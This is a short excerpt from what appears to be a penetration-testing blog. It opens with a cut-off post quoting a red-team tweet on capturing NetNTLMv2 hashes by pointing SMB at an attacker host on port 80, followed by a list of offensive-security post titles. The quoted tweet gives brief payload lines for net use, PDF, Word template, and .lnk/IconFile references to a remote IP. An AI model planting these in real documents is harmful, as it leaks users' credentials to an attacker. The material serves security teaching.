While browsing Twitter recently I came upon a tweet that I found to be very interesting: Did know that u can steal #NetNTLMv2 by changing #SMB port to bypass sec-things: net use \\1.2.3.4@80\tor pdf : /F (\\\\IP@80\\t)or dubdoc : ///IP@80/tor doc: Target="file://IP@80/t.dotx"or lnk: URL=file://IP@80/t.htmor: IconFile=\\IP@80\t.ico#RedTeam #NTLM cc @ddouhine — V (@mynameisv__) April 30, 2019 I…
Categories
n00py Blog
- Bypassing Okta MFA Credential Provider for Windows
- CactusCon 2023: BloodHound Unleashed
- Exploiting Resource Based Constrained Delegation (RBCD) with Pure Metasploit
- Practical Attacks against NTLMv1
- Password Spraying RapidIdentity Logon Portal
- Manipulating User Passwords Without Mimikatz
- Unauthenticated Dumping of Usernames via Cisco Unified Call Manager (CUCM)
- Adding DCSync Permissions from Linux
- Resetting an Expired Password Remotely
- Dumping Plaintext RDP credentials from svchost.exe
Archives
- February 2023
- January 2023
- October 2022
- March 2022
- January 2022
- September 2021
- May 2021
- December 2020
- August 2020
- May 2020
- February 2020
- January 2020
- December 2019
- June 2019
- March 2019
- October 2018
- August 2018
- June 2018
- April 2018
- March 2018
- January 2018
- December 2017
- November 2017
- October 2017
- September 2017
- August 2017
- June 2017
- April 2017
- March 2017
- January 2017
- October 2016